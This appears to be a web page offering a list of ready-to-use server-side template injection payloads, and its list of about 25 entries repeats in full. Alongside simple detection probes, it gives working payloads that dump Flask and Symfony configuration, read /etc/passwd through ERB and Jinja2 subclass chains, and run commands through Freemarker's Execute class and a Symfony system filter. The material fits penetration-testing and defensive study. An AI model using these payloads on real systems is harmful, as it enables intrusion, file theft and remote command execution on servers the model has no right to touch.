SSTI

108 ready-to-use payloads

108 Payloads

108 of 108

Jinja2 Basic Test {{4*4}}

Basic SSTI detection — evaluates to 16

SSTIJinja2Detection

Payload

{{4*4}}[[5*5]]

Jinja2 Basic Test {{7*7}}

Multiplication test evaluates to 49

SSTIJinja2Detection

Payload

{{7*7}}

Jinja2 String Mult {{7*'7'}}

String multiplication — '7777777'

SSTIJinja2Detection

Payload

{{7*'7'}}

ERB Test <%= 7*7 %>

Ruby ERB template test evaluates to 49

SSTIERBDetection

Payload

<%= 7 * 7 %>

EL Test ${3*3}

Java Expression Language test evaluates to 9

SSTIELDetection

Payload

${3*3}

Jinja2 Dict Test ${{7*7}}

Jinja2 dict syntax test — 49

SSTIJinja2Detection

Payload

${{7*7}}

Razor Test @(1+2)

ASP.NET Razor test evaluates to 3

SSTIRazorDetection

Payload

@(1+2)

Handlebars Test #{3*3}

Handlebars/Underscore test evaluates to 9

SSTIHandlebarsDetection

Payload

#{3*3}

Handlebars Test #{7*7}

Handlebars spaced syntax test — 49

SSTIHandlebarsDetection

Payload

#{ 7 * 7 }

Jinja2 Dump App Config

Dump Symfony app object for info disclosure

SSTIJinja2Info Disclosure

Payload

{{dump(app)}}

Jinja2 Server Variables

Dump all server variables via Symfony request

SSTIJinja2Info Disclosure

Payload

{{app.request.server.all|join(',')}}

Jinja2 Config Dump

Dump Flask app config object

SSTIJinja2Info Disclosure

Payload

{{config.items()}}

Jinja2 Class Hierarchy

Enumerate subclasses from list object

SSTIJinja2Enumeration

Payload

{{ [].class.base.subclasses() }}

Jinja2 MRO Subclasses

Enumerate subclasses via MRO chain

SSTIJinja2Enumeration

Payload

{{''.class.mro()[1].subclasses()}}

Jinja2 Py2 Subclasses

Python 2 subclass enumeration for RCE

SSTIJinja2Enumeration

Payload

{{ ''.__class__.__mro__[2].__subclasses__() }}

Jinja2 Config Iterator

Iterate over config items (Jinja2/Flask)

SSTIJinja2Info Disclosure

Payload

{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}

Jinja2 toUpperCase

Test JS engine access via toUpperCase

SSTIJinja2JS Engine

Payload

{{'a'.toUpperCase()}}

Jinja2 Request Object

Dump Flask request object

SSTIJinja2Info Disclosure

Payload

{{ request }}

Jinja2 Self Object

Dump self/template object reference

SSTIJinja2Info Disclosure

Payload

{{self}}

ERB File Read

Ruby ERB template arbitrary file read

SSTIERBFile Read

Payload

<%= File.open('/etc/passwd').read %>

Freemarker Execute

Freemarker exec via utility class

SSTIFreemarkerRCE

Payload

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Freemarker Execute Alt

Freemarker exec alternate syntax

SSTIFreemarkerRCE

Payload

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

Freemarker One-Liner

Freemarker one-liner command execution

SSTIFreemarkerRCE

Payload

${"freemarker.template.utility.Execute"?new()("id")}

Jinja2 Filter System

Symfony filter system call via query

SSTIJinja2RCE

Payload

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

Jinja2 Py2 File Read

Python 2 — file read via subclasses[40]

SSTIJinja2File Read

Payload

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

SSTI

108 ready-to-use payloads

108 Payloads

108 of 108

Jinja2 Basic Test {{4*4}}

Basic SSTI detection — evaluates to 16

SSTIJinja2Detection

Payload

{{4*4}}[[5*5]]

Jinja2 Basic Test {{7*7}}

Multiplication test evaluates to 49

SSTIJinja2Detection

Payload

{{7*7}}

Jinja2 String Mult {{7*'7'}}

String multiplication — '7777777'

SSTIJinja2Detection

Payload

{{7*'7'}}

ERB Test <%= 7*7 %>

Ruby ERB template test evaluates to 49

SSTIERBDetection

Payload

<%= 7 * 7 %>

EL Test ${3*3}

Java Expression Language test evaluates to 9

SSTIELDetection

Payload

${3*3}

Jinja2 Dict Test ${{7*7}}

Jinja2 dict syntax test — 49

SSTIJinja2Detection

Payload

${{7*7}}

Razor Test @(1+2)

ASP.NET Razor test evaluates to 3

SSTIRazorDetection

Payload

@(1+2)

Handlebars Test #{3*3}

Handlebars/Underscore test evaluates to 9

SSTIHandlebarsDetection

Payload

#{3*3}

Handlebars Test #{7*7}

Handlebars spaced syntax test — 49

SSTIHandlebarsDetection

Payload

#{ 7 * 7 }

Jinja2 Dump App Config

Dump Symfony app object for info disclosure

SSTIJinja2Info Disclosure

Payload

{{dump(app)}}

Jinja2 Server Variables

Dump all server variables via Symfony request

SSTIJinja2Info Disclosure

Payload

{{app.request.server.all|join(',')}}

Jinja2 Config Dump

Dump Flask app config object

SSTIJinja2Info Disclosure

Payload

{{config.items()}}

Jinja2 Class Hierarchy

Enumerate subclasses from list object

SSTIJinja2Enumeration

Payload

{{ [].class.base.subclasses() }}

Jinja2 MRO Subclasses

Enumerate subclasses via MRO chain

SSTIJinja2Enumeration

Payload

{{''.class.mro()[1].subclasses()}}

Jinja2 Py2 Subclasses

Python 2 subclass enumeration for RCE

SSTIJinja2Enumeration

Payload

{{ ''.__class__.__mro__[2].__subclasses__() }}

Jinja2 Config Iterator

Iterate over config items (Jinja2/Flask)

SSTIJinja2Info Disclosure

Payload

{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}

Jinja2 toUpperCase

Test JS engine access via toUpperCase

SSTIJinja2JS Engine

Payload

{{'a'.toUpperCase()}}

Jinja2 Request Object

Dump Flask request object

SSTIJinja2Info Disclosure

Payload

{{ request }}

Jinja2 Self Object

Dump self/template object reference

SSTIJinja2Info Disclosure

Payload

{{self}}

ERB File Read

Ruby ERB template arbitrary file read

SSTIERBFile Read

Payload

<%= File.open('/etc/passwd').read %>

Freemarker Execute

Freemarker exec via utility class

SSTIFreemarkerRCE

Payload

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Freemarker Execute Alt

Freemarker exec alternate syntax

SSTIFreemarkerRCE

Payload

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

Freemarker One-Liner

Freemarker one-liner command execution

SSTIFreemarkerRCE

Payload

${"freemarker.template.utility.Execute"?new()("id")}

Jinja2 Filter System

Symfony filter system call via query

SSTIJinja2RCE

Payload

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

Jinja2 Py2 File Read

Python 2 — file read via subclasses[40]

SSTIJinja2File Read

Payload

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}